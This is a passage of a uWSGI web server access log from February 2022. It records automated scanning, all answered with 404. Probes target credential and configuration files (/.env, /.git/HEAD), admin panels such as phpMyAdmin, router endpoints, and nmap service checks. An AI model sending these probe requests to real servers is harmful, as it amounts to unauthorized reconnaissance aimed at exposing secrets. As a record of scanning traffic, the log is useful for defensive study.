[Fri Feb 4 04:10:56 2022] GET /phpmyadmin/ => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 439/515] 143.198.23.33 () {32 vars in 439 bytes} [Fri Feb 4 04:50:38 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 440/516] 192.241.204.132 () {34 vars in 423 bytes} [Fri Feb 4 05:24:25 2022] GET /portal/redlion => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 441/517] 192.241.212.44 () {34 vars in 424 bytes} [Fri Feb 4 05:32:59 2022] GET /actuator/health => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 442/518] 192.241.198.217 () {34 vars in 407 bytes} [Fri Feb 4 06:03:10 2022] GET /hudson => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 443/519] 109.203.183.134 () {32 vars in 465 bytes} [Fri Feb 4 06:19:41 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 444/520] 83.97.20.34 () {26 vars in 286 bytes} [Fri Feb 4 06:46:12 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 445/521] 62.171.132.199 () {40 vars in 672 bytes} [Fri Feb 4 07:09:57 2022] GET /config/getuser?index=0 => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19147|app: 0|req: 50/522] 193.118.53.210 () {34 vars in 488 bytes} [Fri Feb 4 07:37:21 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 446/523] 84.22.139.90 () {32 vars in 462 bytes} [Fri Feb 4 08:26:06 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches 
on core 0) +[pid: 19148|app: 0|req: 447/524] 104.206.128.2 () {30 vars in 372 bytes} [Fri Feb 4 09:16:44 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 448/525] 192.241.205.24 () {34 vars in 394 bytes} [Fri Feb 4 09:40:35 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 449/526] 14.203.222.226 () {30 vars in 437 bytes} [Fri Feb 4 10:15:17 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 450/527] 83.97.20.34 () {30 vars in 328 bytes} [Fri Feb 4 10:15:25 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 451/528] 62.171.132.199 () {40 vars in 672 bytes} [Fri Feb 4 11:15:06 2022] GET /config/getuser?index=0 => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 452/529] 161.189.192.94 () {40 vars in 725 bytes} [Fri Feb 4 12:05:00 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 453/530] 104.131.59.66 () {36 vars in 481 bytes} [Fri Feb 4 12:40:52 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 454/531] 103.29.68.35 () {32 vars in 409 bytes} [Fri Feb 4 13:03:13 2022] GET /nmaplowercheck1643979793 => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 455/532] 103.29.68.35 () {32 vars in 371 bytes} [Fri Feb 4 13:03:13 2022] GET /HNAP1 => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 456/533] 195.189.248.130 () {32 vars in 465 bytes} [Fri Feb 4 13:03:59 2022] GET / => generated 179 
bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19147|app: 0|req: 51/534] 136.144.41.117 () {40 vars in 568 bytes} [Fri Feb 4 13:07:44 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 457/535] 34.140.248.32 () {42 vars in 564 bytes} [Fri Feb 4 14:32:34 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 458/536] 47.99.168.169 () {34 vars in 457 bytes} [Fri Feb 4 14:54:45 2022] GET /hunmj_serverApi/test.php => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 459/537] 117.248.249.228 () {32 vars in 472 bytes} [Fri Feb 4 15:05:01 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 460/538] 83.97.20.34 () {30 vars in 329 bytes} [Fri Feb 4 16:42:31 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 461/539] 136.144.41.117 () {40 vars in 568 bytes} [Fri Feb 4 17:38:35 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 462/540] 209.17.97.106 () {30 vars in 410 bytes} [Fri Feb 4 18:16:22 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 463/541] 165.232.187.10 () {36 vars in 554 bytes} [Fri Feb 4 18:37:49 2022] GET /system_api.php => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 464/542] 165.232.187.10 () {36 vars in 550 bytes} [Fri Feb 4 18:37:49 2022] GET /c/version.js => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 465/543] 165.232.187.10 () {36 
vars in 578 bytes} [Fri Feb 4 18:37:50 2022] GET /streaming/clients_live.php => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 466/544] 165.232.187.10 () {36 vars in 580 bytes} [Fri Feb 4 18:37:50 2022] GET /stalker_portal/c/version.js => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 467/545] 165.232.187.10 () {36 vars in 552 bytes} [Fri Feb 4 18:37:51 2022] GET /stream/live.php => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 468/546] 165.232.187.10 () {36 vars in 550 bytes} [Fri Feb 4 18:37:51 2022] GET /flu/403.html => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19147|app: 0|req: 52/547] 165.232.187.10 () {36 vars in 526 bytes} [Fri Feb 4 18:37:52 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19146|app: 0|req: 19/548] 83.97.20.34 () {26 vars in 287 bytes} [Fri Feb 4 18:37:52 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 469/549] 20.151.201.9 () {32 vars in 447 bytes} [Fri Feb 4 19:03:57 2022] GET /cgi-bin/luci => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 470/550] 162.142.125.210 () {30 vars in 402 bytes} [Fri Feb 4 19:45:48 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19147|app: 0|req: 53/551] 162.142.125.210 () {22 vars in 236 bytes} [Fri Feb 4 19:45:49 2022] PRI * => generated 179 bytes in 1 msecs (HTTP/2.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 471/552] 167.94.138.47 () {34 vars in 442 bytes} [Fri Feb 4 19:47:42 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 
404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 472/553] 178.159.40.209 () {32 vars in 471 bytes} [Fri Feb 4 20:28:43 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 473/554] 91.236.239.224 () {36 vars in 493 bytes} [Fri Feb 4 21:27:17 2022] GET /.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 474/555] 91.236.239.224 () {38 vars in 527 bytes} [Fri Feb 4 21:27:18 2022] POST / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 475/556] 83.97.20.34 () {30 vars in 329 bytes} [Fri Feb 4 21:48:08 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19147|app: 0|req: 54/557] 185.244.164.69 () {34 vars in 437 bytes} [Fri Feb 4 22:20:31 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 476/558] 167.94.138.62 () {34 vars in 442 bytes} [Fri Feb 4 22:34:13 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19146|app: 0|req: 20/559] 167.94.138.117 () {30 vars in 401 bytes} [Fri Feb 4 22:34:36 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 477/560] 167.94.138.117 () {22 vars in 235 bytes} [Fri Feb 4 22:34:37 2022] PRI * => generated 179 bytes in 1 msecs (HTTP/2.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 478/561] 161.97.106.237 () {40 vars in 629 bytes} [Fri Feb 4 23:10:03 2022] GET / => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 479/562] 174.63.153.17 () {28 vars in 307 bytes} [Fri Feb 4 23:13:48 2022] GET / => generated 179 bytes in 
1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 480/563] 109.237.103.9 () {36 vars in 523 bytes} [Fri Feb 4 23:58:53 2022] GET /.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 481/564] 83.97.20.34 () {26 vars in 287 bytes} [Sat Feb 5 00:53:52 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 482/565] 47.101.191.231 () {34 vars in 460 bytes} [Sat Feb 5 01:44:35 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 483/566] 62.171.132.199 () {40 vars in 672 bytes} [Sat Feb 5 01:51:32 2022] GET /config/getuser?index=0 => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 484/567] 45.180.220.149 () {32 vars in 465 bytes} [Sat Feb 5 02:50:36 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 485/568] 109.237.103.123 () {36 vars in 525 bytes} [Sat Feb 5 04:03:34 2022] GET /.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 486/569] 83.97.20.34 () {30 vars in 328 bytes} [Sat Feb 5 04:39:20 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 487/570] 184.169.220.207 () {30 vars in 459 bytes} [Sat Feb 5 04:55:18 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 488/571] 167.248.133.117 () {34 vars in 444 bytes} [Sat Feb 5 04:59:05 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[uwsgi-http key: client_addr: 31.44.185.119 client_port: 55290] hr_read(): Connection 
reset by peer [plugins/http/http.c line 918] +[pid: 19148|app: 0|req: 489/572] 64.62.197.122 () {28 vars in 307 bytes} [Sat Feb 5 05:36:29 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 490/573] 62.171.132.199 () {40 vars in 672 bytes} [Sat Feb 5 05:42:49 2022] GET /config/getuser?index=0 => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 491/574] 89.248.172.16 () {30 vars in 488 bytes} [Sat Feb 5 05:51:01 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 492/575] 89.248.172.16 () {32 vars in 471 bytes} [Sat Feb 5 05:51:04 2022] GET /favicon.ico => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19147|app: 0|req: 55/576] 130.211.54.158 () {38 vars in 522 bytes} [Sat Feb 5 05:51:12 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 493/577] 136.144.41.117 () {40 vars in 568 bytes} [Sat Feb 5 05:56:50 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 494/578] 176.107.23.166 () {30 vars in 437 bytes} [Sat Feb 5 06:18:05 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 495/579] 167.94.138.44 () {28 vars in 310 bytes} [Sat Feb 5 06:30:04 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 496/580] 167.94.138.44 () {34 vars in 442 bytes} [Sat Feb 5 06:30:04 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 497/581] 45.95.169.102 () {40 vars in 567 bytes} [Sat Feb 5 06:32:55 2022] GET / => 
generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 498/582] 83.97.20.34 () {26 vars in 286 bytes} [Sat Feb 5 06:50:57 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 499/583] 88.80.186.144 () {22 vars in 234 bytes} [Sat Feb 5 07:05:05 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 500/584] 88.80.186.144 () {22 vars in 296 bytes} [Sat Feb 5 07:05:07 2022] GET /nice%20ports%2C/Tri%6Eity.txt%2ebak => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 501/585] 88.80.186.144 () {22 vars in 238 bytes} [Sat Feb 5 07:05:08 2022] OPTIONS / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 502/586] 88.80.186.144 () {22 vars in 237 bytes} [Sat Feb 5 07:05:08 2022] OPTIONS / => generated 179 bytes in 1 msecs (RTSP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 503/587] 88.80.186.144 () {40 vars in 484 bytes} [Sat Feb 5 07:05:09 2022] OPTIONS sip:nm => generated 179 bytes in 1 msecs (SIP/2.0 404) 5 headers in 157 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 504/588] 88.80.186.144 () {32 vars in 389 bytes} [Sat Feb 5 07:05:09 2022] GET /Portal0000.htm => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 505/589] 88.80.186.144 () {36 vars in 462 bytes} [Sat Feb 5 07:05:09 2022] POST /scripts/WPnBr.dll => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19146|app: 0|req: 21/590] 88.80.186.144 () {32 vars in 369 bytes} [Sat Feb 5 07:05:09 2022] GET /nCYR => generated 179 bytes in 5 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 
19147|app: 0|req: 56/591] 88.80.186.144 () {32 vars in 391 bytes} [Sat Feb 5 07:05:09 2022] GET /CSS/Miniweb.css => generated 179 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19144|app: 0|req: 5/592] 88.80.186.144 () {32 vars in 409 bytes} [Sat Feb 5 07:05:09 2022] GET /nmaplowercheck1644044709 => generated 179 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 506/593] 88.80.186.144 () {24 vars in 252 bytes} [Sat Feb 5 07:05:10 2022] OPTIONS * => generated 179 bytes in 2 msecs (RTSP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19139|app: 0|req: 1/594] 88.80.186.144 () {34 vars in 397 bytes} [Sat Feb 5 07:05:09 2022] POST /sdk => generated 179 bytes in 336 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19141|app: 0|req: 1/595] 88.80.186.144 () {32 vars in 397 bytes} [Sat Feb 5 07:05:09 2022] GET /Portal/Portal.mwsl => generated 179 bytes in 372 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 507/596] 88.80.186.144 () {32 vars in 387 bytes} [Sat Feb 5 07:05:10 2022] GET /default.shtml => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 508/597] 88.80.186.144 () {32 vars in 385 bytes} [Sat Feb 5 07:05:10 2022] GET /__Additional => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 509/598] 88.80.186.144 () {32 vars in 379 bytes} [Sat Feb 5 07:05:10 2022] GET /.git/HEAD => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 510/599] 88.80.186.144 () {32 vars in 403 bytes} [Sat Feb 5 07:05:10 2022] GET /pools/default/buckets => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 511/600] 88.80.186.144 () {32 vars in 442 bytes} [Sat 
Feb 5 07:05:10 2022] GET /?=PHPE9568F36-D428-11d2-A769-00AA001ACF42 => generated 179 bytes in 0 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 512/601] 88.80.186.144 () {32 vars in 371 bytes} [Sat Feb 5 07:05:10 2022] GET /HNAP1 => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 513/602] 88.80.186.144 () {32 vars in 361 bytes} [Sat Feb 5 07:05:10 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 514/603] 88.80.186.144 () {32 vars in 403 bytes} [Sat Feb 5 07:05:10 2022] GET /docs/cplugError.html/ => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19146|app: 0|req: 22/604] 88.80.186.144 () {32 vars in 377 bytes} [Sat Feb 5 07:05:11 2022] GET /base.jsp => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19147|app: 0|req: 57/605] 88.80.186.144 () {32 vars in 442 bytes} [Sat Feb 5 07:05:11 2022] GET /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000 => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19147|app: 0|req: 58/606] 88.80.186.144 () {32 vars in 371 bytes} [Sat Feb 5 07:05:11 2022] GET /pools => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19147|app: 0|req: 59/607] 88.80.186.144 () {32 vars in 361 bytes} [Sat Feb 5 07:05:11 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19147|app: 0|req: 60/608] 88.80.186.144 () {32 vars in 381 bytes} [Sat Feb 5 07:05:11 2022] GET /index.html => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 515/609] 88.80.186.144 () {32 vars in 383 bytes} [Sat Feb 5 07:05:12 2022] GET /favicon.ico => generated 179 bytes in 
1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 516/610] 88.80.186.144 () {32 vars in 362 bytes} [Sat Feb 5 07:05:12 2022] HEAD / => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 517/611] 88.80.186.144 () {32 vars in 379 bytes} [Sat Feb 5 07:05:12 2022] GET /index.asp => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 518/612] 88.80.186.144 () {32 vars in 375 bytes} [Sat Feb 5 07:05:12 2022] GET /menu.pl => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 519/613] 88.80.186.144 () {32 vars in 361 bytes} [Sat Feb 5 07:05:12 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19146|app: 0|req: 23/614] 88.80.186.144 () {32 vars in 377 bytes} [Sat Feb 5 07:05:13 2022] GET /menu.php => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19143|app: 0|req: 2/615] 88.80.186.144 () {32 vars in 381 bytes} [Sat Feb 5 07:05:14 2022] GET /indice.jsa => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19145|app: 0|req: 4/616] 88.80.186.144 () {28 vars in 389 bytes} [Sat Feb 5 07:05:15 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19144|app: 0|req: 6/617] 88.80.186.144 () {28 vars in 307 bytes} [Sat Feb 5 07:05:21 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 520/618] 161.97.106.237 () {40 vars in 629 bytes} [Sat Feb 5 09:15:23 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 521/619] 101.36.126.176 () {30 vars in 329 bytes} [Sat Feb 5 
09:25:24 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 522/620] 192.241.208.247 () {34 vars in 395 bytes} [Sat Feb 5 09:35:52 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 523/621] 45.170.223.191 () {32 vars in 464 bytes} [Sat Feb 5 09:58:17 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 524/622] 167.99.246.82 () {34 vars in 523 bytes} [Sat Feb 5 10:42:40 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 525/623] 83.97.20.34 () {30 vars in 329 bytes} [Sat Feb 5 10:50:55 2022] GET / => generated 179 bytes in 32 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 526/624] 95.47.123.124 () {32 vars in 464 bytes} [Sat Feb 5 10:52:32 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 527/625] 136.144.41.117 () {40 vars in 568 bytes} [Sat Feb 5 11:08:03 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 528/626] 167.248.133.45 () {28 vars in 311 bytes} [Sat Feb 5 11:21:30 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19142|app: 0|req: 1/627] 167.248.133.45 () {34 vars in 443 bytes} [Sat Feb 5 11:21:30 2022] GET / => generated 179 bytes in 244 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 529/628] 161.97.106.237 () {40 vars in 629 bytes} [Sat Feb 5 11:42:05 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 530/629] 83.97.20.34 () {26 vars in 287 
bytes} [Sat Feb 5 12:48:20 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 531/630] 1.13.3.249 () {22 vars in 231 bytes} [Sat Feb 5 13:00:16 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 532/631] 35.233.62.116 () {42 vars in 562 bytes} [Sat Feb 5 13:58:19 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 533/632] 39.99.248.30 () {34 vars in 410 bytes} [Sat Feb 5 14:03:38 2022] POST /sdk => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19147|app: 0|req: 61/633] 39.99.248.30 () {32 vars in 408 bytes} [Sat Feb 5 14:03:38 2022] GET /text4041644069817 => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19147|app: 0|req: 62/634] 39.99.248.30 () {32 vars in 394 bytes} [Sat Feb 5 14:03:38 2022] GET /evox/about => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19146|app: 0|req: 24/635] 39.99.248.30 () {28 vars in 306 bytes} [Sat Feb 5 14:03:38 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 534/636] 39.99.248.30 () {32 vars in 384 bytes} [Sat Feb 5 14:03:38 2022] GET /HNAP1 => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 535/637] 39.99.248.30 () {36 vars in 462 bytes} [Sat Feb 5 14:03:49 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 536/638] 39.99.248.30 () {34 vars in 413 bytes} [Sat Feb 5 14:03:49 2022] GET /favicon.ico => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 
